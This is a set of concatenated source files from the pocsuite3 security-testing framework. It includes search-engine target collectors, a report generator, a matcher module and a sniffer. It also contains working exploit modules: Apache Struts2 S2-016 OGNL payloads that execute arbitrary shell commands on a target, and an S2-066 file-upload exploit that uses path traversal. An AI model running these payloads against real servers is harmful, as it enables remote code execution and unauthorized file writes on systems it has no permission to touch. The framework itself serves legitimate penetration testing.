from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import conf
from pocsuite3.api import Seebug
from pocsuite3.api import register_plugin


class PocFromSeebug(PluginBase):
    category = PLUGIN_TYPE.POCS

    def init_seebug_api(self):
        self.seebug = Seebug(token=conf.seebug_token)

    def init(self):
        self.init_seebug_api()
        if conf.poc:
            for _ in conf.poc:
                if _.startswith('ssvid-'):
                    poc = self.seebug.fetch_poc(_)
                    if poc and self.add_poc(poc):
                        info_msg = "[PLUGIN] load PoC script {0} from seebug success".format(_)
                    else:
                        info_msg = "[PLUGIN] load PoC script {0} from seebug failed".format(_)
                    logger.info(info_msg)

        if conf.vul_keyword:
            pocs = self.seebug.search_poc(conf.vul_keyword)
            info_msg = "Found {0} available PoC(s) from Seebug website".format(len(pocs))
            logger.info(info_msg)

            for poc_item in pocs:
                ssvid = str(poc_item['id'])
                poc = self.seebug.fetch_poc(ssvid)
                if poc and self.add_poc(poc):
                    info_msg = "[PLUGIN] load PoC script '{0}' from seebug success".format(poc_item['name'])
                else:
                    info_msg = "[PLUGIN] load PoC script '{0}' from seebug failed".format(poc_item['name'])
                logger.info(info_msg)

        if conf.ssvid:
            ssvid = conf.ssvid
            poc = self.seebug.fetch_poc(ssvid)
            if poc and self.add_poc(poc):
                info_msg = "[PLUGIN] load PoC script 'ssvid-{0}' from seebug success".format(ssvid)
            else:
                info_msg = "[PLUGIN] load PoC script 'ssvid-{0}' from seebug failed".format(ssvid)
            logger.info(info_msg)


register_plugin(PocFromSeebug)



import getpass
import time
from base64 import b64encode
from configparser import ConfigParser
from pocsuite3.lib.core.data import logger, kb, paths
from pocsuite3.lib.core.common import is_ipv6_address_format
from pocsuite3.lib.request import requests


class ZoomEye():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
        self.url = None
        self.headers = {
            'User-Agent': 'curl/7.80.0',
            "Content-Type": "application/json",
        }
        self.token = token
        self.points = None
        self.zoomeye_points = None
        self.plan = None
        self.conf_path = conf_path

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.token or self.parser.get('ZoomEye', 'token')
                self.url = self.url or self.parser.get('ZoomEye', 'url')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token:
            try:
                self.headers['API-KEY'] = self.token
                resp = requests.post(f'{self.url}/v2/userinfo', headers=self.headers)
                if resp and resp.status_code == 200 and 'plan' in resp.text:
                    content = resp.json()
                    self.plan = content['data']['subscription']['plan']
                    self.points = content['data']['subscription']['points']
                    self.zoomeye_points = content['data']['subscription']['zoomeye_points']
                    return True
                else:
                    logger.info(resp.text)
                    return False
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_token(self):
        if self.token and self.url:
            if self.token_is_available():
                return True

        while True:
            logger.info("Users in mainland China should use https://api.zoomeye.org, "
                        "while other users should use https://api.zoomeye.ai.")
            self.url = input("ZoomEye Url:").rstrip('/')
            self.token = getpass.getpass("ZoomEye API token: (input will hidden)")
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The ZoomEye api token is incorrect, Please enter the correct api token.")

    def write_conf(self):
        if not self.parser.has_section("ZoomEye"):
            self.parser.add_section("ZoomEye")
        try:
            self.parser.set("ZoomEye", "token", self.token)
            self.parser.set("ZoomEye", "url", self.url)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def search(self, dork, pages=2, pagesize=20, search_type="v4"):
        search_result = set()
        if kb.comparison:
            kb.comparison.add_dork("Zoomeye", dork)
        try:
            for page in range(1, pages + 1):
                time.sleep(1)
                url = f'{self.url}/v2/search'
                data = {
                    "qbase64": b64encode(dork.encode('utf-8')).decode('utf-8'),
                    "page": page,
                    "pagesize": pagesize,
                    "sub_type": search_type,
                    "fields": "ip,port,domain,service,honeypot"
                }

                resp = requests.post(url, headers=self.headers, timeout=60, json=data)
                content = resp.json()
                if resp and resp.status_code == 200 and content.get("code", None) == 60000:

                    for match in content['data']:
                        if match['domain']:
                            url = match['domain']
                        else:
                            host = match['ip']
                            port = match['port']
                            url = f'[{host}]:{port}' if is_ipv6_address_format(host) else f'{host}:{port}'
                            scheme = ''
                            if match['service']:
                                scheme = str(match['service'].split('/')[-1])
                            if scheme:
                                url = f'{scheme}://{url}'

                        search_result.add(url)
                        if kb.comparison:
                            honeypot = False
                            if match['honeypot'] == 1:
                                honeypot = True
                            kb.comparison.add_ip(match['ip'], "Zoomeye", honeypot)
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == "__main__":
    kb.comparison = False
    ze = ZoomEye()
    res = ze.search(dork='"<title>Vigor 300B</title>"', pages=1)
    print(res)
    res = ze.search(dork='domain="google.com"', pages=1, pagesize=100, search_type='all')
    print(res)



from pocsuite3.lib.core.data import logger, conf
from xmlrpc.client import ServerProxy
from packaging.version import parse as parse_version
from pocsuite3 import __version__


def update():
    if not conf.update_all:
        return
    logger.info('Checking the latest version number of pocsuite3 on pypi')
    client = ServerProxy('https://pypi.python.org/pypi')
    versions = client.package_releases('pocsuite3', True)
    upstream_version = max(map(parse_version, versions))
    current_version = parse_version(__version__)
    logger.info(f'Current upstream version: {upstream_version}')
    if current_version < upstream_version:
        logger.info(''
                    '----[ 1.1 - Installtion & Upgrade Methods\n'
                    '\n'
                    'Python pip\n'
                    '\n'
                    '    $ pip3 install -U pocsuite3\n'
                    '\n'
                    '    $ use other pypi mirror\n'
                    '    $ pip3 install -U -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3\n'
                    '\n'
                    'MacOS\n'
                    '\n'
                    '    $ brew install pocsuite3\n'
                    '\n'
                    'Kali, Ubuntu 22.04, Debian\n'
                    '\n'
                    '    $ sudo apt-get install pocsuite3\n'
                    '\n'
                    'Docker\n'
                    '\n'
                    '    $ docker run -it pocsuite3/pocsuite3\n'
                    '\n'
                    'ArchLinux\n'
                    '\n'
                    '    $ yay pocsuite3\n'
                    '\n'
                    'Install from source code\n'
                    '\n'
                    '    $ wget https://github.com/knownsec/pocsuite3/archive/master.zip\n'
                    '    $ unzip master.zip\n'
                    '    $ cd pocsuite3-master\n'
                    '    $ pip3 install -r requirements.txt\n'
                    '    $ python3 setup.py install\n'
                    )



import time
import sys
import os
from pocsuite3 import __version__
from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import conf
from pocsuite3.api import paths
from pocsuite3.api import get_results
from pocsuite3.api import register_plugin
from pocsuite3.lib.utils.markup import page


class HtmlExport:
    def __init__(self, filename='', title='Report of []'):
        self.filename = filename
        self.title = title
        self.html = page()
        self.style = """
        html {
            position: relative;
            min-height: 100%;
        }
        body {margin-bottom: 60px;}
        .footer {
            position: absolute;
            margin: 10px 0px;
            width: 100%;
            background-color: #f5f5f5;
        }
        body > .container {
          padding: 60px 15px 0;
        }
        .container .text-muted {
          margin: 20px 0;
        }

        .footer > .container {
          padding: 20px 15px;
        }

        code {
          font-size: 80%;
        }
        """

    def _write_header(self):
        self.html.init(title=self.title,
                       charset='utf-8',
                       encoding='utf-8',
                       style=self.style,
                       metainfo={
                           'viewport': 'width=device-width, initial-scale=1, shrink-to-fit=no'},
                       css=['https://cdn.bootcss.com/bootstrap/4.0.0/css/bootstrap.min.css'],
                       script=['https://cdn.bootcss.com/jquery/3.2.1/jquery.slim.min.js',
                               'https://cdn.bootcss.com/popper.js/1.12.9/umd/popper.min.js',
                               'https://cdn.bootcss.com/bootstrap/4.0.0/js/bootstrap.min.js'
                               ]
                       )

    def _write_navbar(self, name='Target', menus={}):
        self.html.nav(class_="navbar navbar-dark bg-dark fixed-top")
        self.html.addcontent('<a class="navbar-brand" href="#">{0}</a>'.format(name))
        self.html.addcontent('<button class="navbar-toggler" type="button" data-toggle="collapse" '
                             'data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" '
                             'aria-expanded="false" aria-label="Toggle navigation">'
                             '<span class="navbar-toggler-icon"></span></button>')
        self.html.div(class_="collapse navbar-collapse", id_="navbarNavDropdown")
        self.html.ul(class_="navbar-nav")
        for k, v in menus.items():
            self.html.addcontent('<li class="nav-item"><a class="nav-link" href="{0}">{1}</a></li>'.format(v, k))
        self.html.ul.close()
        self.html.div.close()
        self.html.nav.close()

    def _writer_footer(self):
        text = 'Report was automatically generated by pocsuite3 version {0} @ {1}</br>Command line: {2}'.format(
            __version__,
            time.strftime("%Y-%m-%d %H:%M:%S"),
            " ".join(sys.argv)
        )

        self.html.footer(class_="footer")
        self.html.div(class_="container")
        self.html.addcontent('<span class="text-muted">{0}</span>'.format(text))
        self.html.div.close()
        self.html.footer.close()
        self.html.addcontent('<script type="text/javascript">'
                             'function copyAll() {'
                             'var targetValue = $("#all-target").val();'
                             'navigator.clipboard.writeText(targetValue).then(function() {'
                             'alert("Copy Successful");'
                             '}, function(err) {'
                             'alert("Copy failed");'
                             '});'
                             '}'
                             '</script>')
        self.html.addcontent('<script type="text/javascript">'
                             'function copySuc() {'
                             'var targetValue = $("#suc-target").val();'
                             'navigator.clipboard.writeText(targetValue).then(function() {'
                             'alert("Copy successful");'
                             '}, function(err) {'
                             'alert("Copy failed");'
                             '});'
                             '}'
                             '</script>')

        self.html.body.close()
        self.html.html.close()

    def write_results(self, results=None):
        if results:
            self.html.addcontent('<button onclick="copyAll()" class="btn btn-primary" '
                                 'style="margin-bottom: 10px">Copy all</button>')
            self.html.addcontent('<button onclick="copySuc()" class="btn btn-success"'
                                 ' style="margin-bottom: 10px">Copy Successful</button>')
            self.html.addcontent('<table class="table table-striped table-bordered table-hover">'
                                 '<thead class="thead-dark"><tr>'
                                 '<th scope="col">Target</th>'
                                 '<th scope="col">PoC/Exp Name</th>'
                                 '<th scope="col">SSVID</th>'
                                 '<th scope="col">Component</th>'
                                 '<th scope="col">Version</th>'
                                 '<th scope="col">Status</th>'
                                 '<th scope="col">Extra</th>'
                                 '</tr></thead><tbody>'
                                 )
            all_target = []
            suc_target = []

            for result in results:
                all_target.append(result.target)
                if result.status == 'success':
                    suc_target.append(result.target)
                    content = (
                        '<tr>'
                        '<td><a href="{0}" target="_blank">{1}</a></td>'
                        '<td>{2}</td>'
                        '<td><a href="https://www.seebug.org/vuldb/ssvid-{3}" target="_blank">{4}</a></td>'
                        '<td>{5}</td>'
                        '<td>{6}</td>'
                        '<td><span class="badge badge-success">{7}</span></td>'
                        '<td>{8}</td>'
                        '</tr>'
                    )
                else:
                    content = (
                        '<tr>'
                        '<td><a href="{0}" target="_blank">{1}</a></td>'
                        '<td>{2}</td>'
                        '<td><a href="https://www.seebug.org/vuldb/ssvid-{3}" target="_blank">{4}</a></td>'
                        '<td>{5}</td>'
                        '<td>{6}</td>'
                        '<td><span class="badge badge-secondary">{7}</span></td>'
                        '<td>{8}</td>'
                        '</tr>'
                    )
                result.result.get('VerifyInfo').pop('URL')
                extra_info = '/'.join([item for item in result.result.get('VerifyInfo').values()])
                self.html.addcontent(content.format(result.target,
                                                    result.target,
                                                    result.poc_name,
                                                    result.vul_id,
                                                    result.vul_id,
                                                    result.app_name,
                                                    result.app_version,
                                                    result.status,
                                                    extra_info)
                                     )

            self.html.addcontent('</tbody></table>')
            self.html.addcontent('<textarea id="all-target" style="display:none">{}</textarea>'.format(
                '\n'.join(all_target)
            ))
            self.html.addcontent('<textarea id="suc-target" style="display:none">{}</textarea>'.format(
                '\n'.join(suc_target)
            ))

    def write_html(self, results=None):
        menus = {
            'Site': 'https://pocsuite.org',
            'Seebug': 'https://www.seebug.org',
            'Help': 'https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md',
            'Bug report': 'https://github.com/knownsec/pocsuite3/issues',
        }
        self._write_header()
        self._write_navbar(name='Pocsuite3', menus=menus)
        self.html.main(role_="main", class_='container')
        self.write_results(results)
        self.html.main.close()
        self._writer_footer()

        with open(self.filename, 'w', encoding='utf-8') as f:
            for x in self.html.content:
                try:
                    f.write("{0}\n".format(x))
                except Exception:
                    pass


class HtmlReport(PluginBase):
    category = PLUGIN_TYPE.RESULTS

    def init(self):
        debug_msg = "[PLUGIN] html_report plugin init..."
        logger.debug(debug_msg)

    def start(self):
        # TODO
        # Generate html report
        filename = "pocsuite_{0}.html".format(time.strftime("%Y%m%d_%H%M%S"))
        filename = os.path.join(paths.POCSUITE_OUTPUT_PATH, filename)
        if conf.url:
            title = "Report of {0}".format(repr(conf.url))
        elif conf.dork:
            title = "Report of [{0}]".format(conf.dork)
        else:
            title = "Report of [{0}]".format('Plugin imported targets')
        html_export = HtmlExport(filename=filename, title=title)
        results = get_results()
        if results:
            results = sorted(results, key=lambda r: r.status, reverse=True)
        html_export.write_html(results)

        info_msg = '[PLUGIN] generate html report at {0}'.format(filename)
        logger.info(info_msg)


register_plugin(HtmlReport)



import random
from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-016']
    name = 'Apache Struts2 s2-016'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.15'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-015:影响版本Struts 2.0.0 - Struts 2.3.15;'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        num1 = random.randint(10000, 100000)
        num2 = random.randint(10000, 100000)
        check_poc = "redirect%3A%24%7B{num1}%2B{num2}%7D"
        poc = check_poc.format(num1=num1, num2=num2)
        r = requests.get(self.url + "?" + poc)
        nn = str(num1 + num2)
        if nn in r.url:
            result["VerifyInfo"] = {
                "URL": self.url,
                "PAYLOAD": poc
            }
            return result
        return False

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            command = self.get_option("command")

            falg = random_str(10).lower()
            temp = "echo " + falg + ";"
            exec_payload1 = "redirect%3A%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader%20(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println%20(%23e)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D"
            exec_payload2 = "redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22{cmd}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D"
            exec_payload3 = r"redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27CMD%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27ENCODING%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}"

            payload1 = exec_payload1.format(cmd=quote(temp))
            html = requests.get(self.url + "?" + payload1).text.lower()
            if falg in html.lower():
                payload1 = exec_payload1.format(cmd=quote(command))
                html = requests.get(self.url + "?" + payload1).text
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "HTML": html.replace("\x00", "").encode()
                }

            payload2 = exec_payload2.format(cmd=quote(temp))
            html = requests.get(self.url + "?" + payload2).text.lower()
            if falg in html:
                payload2 = exec_payload2.format(cmd=quote(command))
                html = requests.get(self.url + "?" + payload2).text
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "HTML": html.replace("\x00", "").encode()
                }
            payload3 = exec_payload3.replace('CMD', quote(temp))
            html = requests.get(self.url + "?" + payload3).text.lower()
            if falg in html:
                payload3 = exec_payload3.replace('CMD', quote(command))
                html = requests.get(self.url + "?" + payload3).text
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "HTML": html.replace("\x00", "").encode()
                }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import binascii
import re
from dataclasses import dataclass, field
from lxml import html
from typing import List

from pocsuite3.lib.yaml.nuclei.model import CaseInsensitiveEnum
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions import evaluate, Marker


class MatcherType(CaseInsensitiveEnum):
    StatusMatcher = "status"
    SizeMatcher = "size"
    WordsMatcher = "word"
    RegexMatcher = "regex"
    BinaryMatcher = "binary"
    DSLMatcher = "dsl"
    XpathMatcher = "xpath"


@dataclass
class Matcher:
    """Matcher is used to match a part in the output from a protocol.
    """

    # Type is the type of the matcher.
    type: MatcherType = MatcherType.WordsMatcher

    # Condition is the optional condition between two matcher variables. By default, the condition is assumed to be OR.
    condition: str = 'or'

    # Part is the part of the request response to match data from. Each protocol exposes a lot of different parts.
    # default matched part is body if not defined.
    part: str = 'body'

    # Negative specifies if the match should be reversed. It will only match if the condition is not true.
    negative: bool = False

    # Name of the matcher. Name should be lowercase and must not contain spaces or underscores (_).
    name: str = ''

    # Status are the acceptable status codes for the response.
    status: List[int] = field(default_factory=list)

    # Size is the acceptable size for the response
    size: List[int] = field(default_factory=list)

    # Words contains word patterns required to be present in the response part.
    words: List[str] = field(default_factory=list)

    # Regex contains Regular Expression patterns required to be present in the response part.
    regex: List[str] = field(default_factory=list)

    # Xpath contains xpath patterns required to be present in the response part.
    xpath: List[str] = field(default_factory=list)

    # Binary are the binary patterns required to be present in the response part.
    binary: List[str] = field(default_factory=list)

    # DSL are the dsl expressions that will be evaluated as part of nuclei matching rules.
    dsl: List[str] = field(default_factory=list)

    # Encoding specifies the encoding for the words field if any.
    encoding: str = ''

    # CaseInsensitive enables case-insensitive matches. Default is false.
    case_insensitive: bool = False

    # MatchAll enables matching for all matcher values. Default is false.
    match_all: bool = False


def match_status_code(matcher: Matcher, status_code: int):
    """Matches a status code check against a corpus
    """
    return status_code in matcher.status


def match_size(matcher: Matcher, length: int):
    """Matches a size check against a corpus
    """
    return length in matcher.size


def match_words(matcher: Matcher, corpus: str, data: dict) -> (bool, list):
    """Matches a word check against a corpus
    """
    if matcher.case_insensitive:
        corpus = corpus.lower()

    matched_words = []
    for i, word in enumerate(matcher.words):
        word = evaluate(word, data)
        if matcher.encoding == 'hex':
            try:
                word = binascii.unhexlify(word).decode()
            except (ValueError, UnicodeDecodeError):
                pass
        if matcher.case_insensitive:
            word = word.lower()

        if word not in corpus:
            if matcher.condition == 'and':
                return False, []
            elif matcher.condition == 'or':
                continue

        if matcher.condition == 'or' and not matcher.match_all:
            return True, [word]

        matched_words.append(word)

        if len(matcher.words) - 1 == i and not matcher.match_all:
            return True, matched_words

    if len(matched_words) > 0 and matcher.match_all:
        return True, matched_words

    return False, []


def match_regex(matcher: Matcher, corpus: str) -> (bool, list):
    """Matches a regex check against a corpus
    """
    matched_regexes = []
    for i, regex in enumerate(matcher.regex):
        if not re.search(regex, corpus):
            if matcher.condition == 'and':
                return False, []
            elif matcher.condition == 'or':
                continue

        current_matches = re.findall(regex, corpus)
        if matcher.condition == 'or' and not matcher.match_all:
            return True, matched_regexes

        matched_regexes = matched_regexes + current_matches
        if len(matcher.regex) - 1 == i and not matcher.match_all:
            return True, matched_regexes

    if len(matched_regexes) > 0 and matcher.match_all:
        return True, matched_regexes

    return False, []


def match_binary(matcher: Matcher, corpus: bytes) -> (bool, list):
    """Matches a binary check against a corpus
    """
    matched_binary = []
    for i, binary in enumerate(matcher.binary):
        binary = binascii.unhexlify(binary)
        if binary not in corpus:
            if matcher.condition == 'and':
                return False, []
            elif matcher.condition == 'or':
                continue

        if matcher.condition == 'or':
            return True, [binary]

        matched_binary.append(binary)
        if len(matcher.binary) - 1 == i:
            return True, matched_binary

    return False, []


def match_dsl(matcher: Matcher, data: dict) -> bool:
    """Matches on a generic map result
    """
    for i, expression in enumerate(matcher.dsl):
        result = evaluate(f'{Marker.ParenthesisOpen}{expression}{Marker.ParenthesisClose}', data)
        if not isinstance(result, bool):
            if matcher.condition == 'and':
                return False
            elif matcher.condition == 'or':
                continue

        if result is False:
            if matcher.condition == 'and':
                return False
            elif matcher.condition == 'or':
                continue

        if len(matcher.dsl) - 1 == i:
            return True
    return False


def match_xpath(matcher: Matcher, body: str) -> (bool, list):
    """Matches xpath check against a body.
    """
    # Convert the body string to etree.HTML object for xpath manipulations
    if body is None:
        return False
    body_tree = html.fromstring(body)
    matched_xpaths = []

    for i, xpath_pattern in enumerate(matcher.xpath):
        try:
            # Applying xpath on the HTML and capturing the result
            result = body_tree.xpath(xpath_pattern)
            if not result:
                # If result is empty, the xpath expression did not match anything in the HTML body
                if matcher.condition == 'and':
                    return False, []
                elif matcher.condition == 'or':
                    continue

            if matcher.condition == 'or' and not matcher.match_all:
                return True, [result]

            matched_xpaths.append(result)

            if len(matcher.xpath) - 1 == i and not matcher.match_all:
                return True, matched_xpaths

        except Exception as e:
            print(f"Error while matching with XPath {xpath_pattern}. Error: {str(e)}")

    if len(matched_xpaths) > 0 and matcher.match_all:
        return True, matched_xpaths

    return False, []



from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = '99789'  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-12-4'
    createDate = '2023-12-10'
    updateDate = '2023-12-10'
    references = ['https://www.seebug.org/vuldb/ssvid-99789']
    name = 'Apache Struts2 s2-066'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.37 (EOL), Struts 2.5.0 - Struts 2.5.32, Struts 6.0.0 - Struts 6.3.0'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = ''''''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["param"] = OptString('upload', description="上传文件用到的name参数")
        o["filename"] = OptString('../../manager/success.txt', description="上传的文件名称，可以以../目录穿越命名")
        o["filecontext"] = OptString('Upload Success!', description="上传的文件内容")
        return o

    def _verify(self):
        result = {}
        upload = self.get_option("param")
        filename = self.get_option("filename")
        url = self.url.rstrip('/') + f"?{upload}FileName={filename}"
        def_url = self.url.rstrip('/') + f"?{upload}FileName=1.txt"
        if upload is not None and len(upload) > 0:
            upload = upload[0].upper() + upload[1:]
        headers = {
            "Connection": "Close",
            "Content-Type": "multipart/form-data; boundary=3b0bfa1f36cb6157a128f0549a4a7446",
        }

        file_context = self.get_option("filecontext").encode()
        # html = requests.post(self.url, files=files, headers=headers).text
        data = b'''--3b0bfa1f36cb6157a128f0549a4a7446
Content-Disposition: form-data; name="{UPLOAD}"; filename="test.jpg"
Content-Type: text/plain

{CONTEXT}
--3b0bfa1f36cb6157a128f0549a4a7446--
'''.replace(b'{UPLOAD}', upload.encode()).replace(b'{CONTEXT}', file_context).replace(b'\n', b'\r\n')
        requests.post(def_url, data=data, headers=headers)
        requests.post(url, data=data, headers=headers)
        res = requests.get(self.url.rstrip("/") + "/../../manager/success.txt")
        if "Upload Success!" in res.text:
            result["VerifyInfo"] = {
                "URL": self.url.rstrip('/') + f"/{self.get_option('filename')}",
                "info": "Upload Success! "
            }

        return self.parse_output(result)

    def _attack(self):
        self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import os
from threading import Thread, Event
from pocsuite3.lib.core.common import data_to_stdout, mosaic
from pocsuite3.lib.core.data import logger

import logging
os.environ["MPLBACKEND"] = "Agg"
logging.getLogger("scapy").setLevel(logging.ERROR)
from scapy.all import (
    WINDOWS,
    get_if_list,
    get_if_addr,
    AsyncSniffer
)


class Sniffer(Thread):
    def __init__(self, filter):
        super().__init__()
        self.filter = "host %s" % filter
        self.daemon = True
        self.socket = None
        self.use_pcap = True
        self.is_admin = False
        logger.info(
            'Local network adapter information, choose a network you want to '
            'capture.'
        )
        message = '----- Local IP Address -----\n'
        ifaces = []
        if WINDOWS:
            import ctypes
            from scapy.all import IFACES
            if ctypes.windll.shell32.IsUserAnAdmin():
                self.is_admin = True
            for i, iface in enumerate(sorted(IFACES)):
                dev = IFACES[iface]
                ifaces.append(dev.description)
                message += "{0}   {1}    {2}\n".format(
                    i, dev.description, mosaic(dev.ip))
        else:
            if os.getuid() == 0:
                self.is_admin = True
            ifaces = get_if_list()
            for i, iface in enumerate(ifaces):
                ip = get_if_addr(iface)
                message += "{0}   {1}    {2}\n".format(i, iface, mosaic(ip))
        data_to_stdout(message)
        choose = input('Choose>: ').strip()
        self.interface = ifaces[int(choose)]
        self.use_pcap = True
        self.stop_sniffer = Event()
        self.pcap = None

    def run(self):
        self.pcap = AsyncSniffer()
        # In order to ensure that all packets can be captured,
        # a adapter must be specified. If it is all adapters,
        # it will lost the data package
        self.pcap._run(iface=self.interface, filter=self.filter)

    def join(self, timeout=None):
        self.pcap.continue_sniff = False
        super().join(timeout)



import time
import urllib
import getpass
from configparser import ConfigParser
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.core.common import is_ipv6_address_format
from pocsuite3.lib.request import requests


class Shodan():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
        self.url = 'https://api.shodan.io'
        self.headers = {'User-Agent': 'curl/7.80.0'}
        self.credits = 0
        self.conf_path = conf_path
        self.token = token

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.token or self.parser.get("Shodan", 'Token')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token:
            try:
                resp = requests.get(f'{self.url}/account/profile?key={self.token}', headers=self.headers)
                logger.info(resp.text)
                if resp and resp.status_code == 200 and "member" in resp.json():
                    self.credits = resp.json()['credits']
                    return True
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_token(self):
        if self.token_is_available():
            return True

        while True:
            new_token = getpass.getpass("Shodan API Token: (input will hidden)")
            self.token = new_token
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The shodan api token is incorrect, Please enter the correct api token.")

    def write_conf(self):
        if not self.parser.has_section("Shodan"):
            self.parser.add_section("Shodan")
        try:
            self.parser.set("Shodan", "Token", self.token)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def search(self, dork, pages=1):
        resource = 'host'
        dork = urllib.parse.quote(dork)
        search_result = set()
        try:
            for page in range(1, pages + 1):
                time.sleep(1)
                url = f"{self.url}/shodan/{resource}/search?key={self.token}&query={dork}&page={page}"
                resp = requests.get(url, headers=self.headers, timeout=60)
                if resp and resp.status_code == 200 and "total" in resp.json():
                    content = resp.json()
                    for match in content['matches']:
                        ans = match['ip_str']
                        if 'port' in match:
                            if is_ipv6_address_format(ans):
                                ans = f'[{ans}]'
                            ans += ':' + str(match['port'])
                        search_result.add(ans)
                else:
                    logger.error("[PLUGIN] Shodan:{}".format(resp.text))
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == "__main__":
    sd = Shodan()
    sd.search(dork='"<title>Vigor 300B</title>"')



from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import conf
from pocsuite3.api import Quake
from pocsuite3.api import register_plugin
from pocsuite3.api import kb
from pocsuite3.lib.core.exception import PocsuitePluginDorkException


class TargetFromQuake(PluginBase):
    category = PLUGIN_TYPE.TARGETS

    def init_quake_api(self):
        self.quake = Quake(token=conf.quake_token)

    def init(self):
        self.init_quake_api()
        dork = None
        if conf.dork_quake:
            dork = conf.dork_quake
        else:
            dork = conf.dork
        if not dork:
            msg = "Need to set up dork (please --dork or --dork-quake)"
            raise PocsuitePluginDorkException(msg)
        if conf.dork_b64:
            import base64
            dork = str(base64.b64decode(dork), encoding="utf-8")

        if kb.comparison:
            kb.comparison.add_dork("Quake", dork)
        info_msg = "[PLUGIN] try fetch targets from Quake with dork: {0}".format(
            dork)
        logger.info(info_msg)
